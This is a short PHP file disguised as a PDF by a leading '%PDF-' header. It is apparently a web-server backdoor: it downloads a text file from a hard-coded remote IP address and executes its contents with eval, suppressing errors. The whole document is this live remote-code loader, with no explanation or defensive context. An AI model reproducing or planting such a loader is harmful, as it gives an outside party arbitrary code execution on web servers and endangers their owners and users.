%PDF- %PDF-<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://69.197.162.114/z60525_o/stat/index.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$d = curl_exec($ch);
curl_close($ch);
if(!empty($d)) @eval('?>'. $d);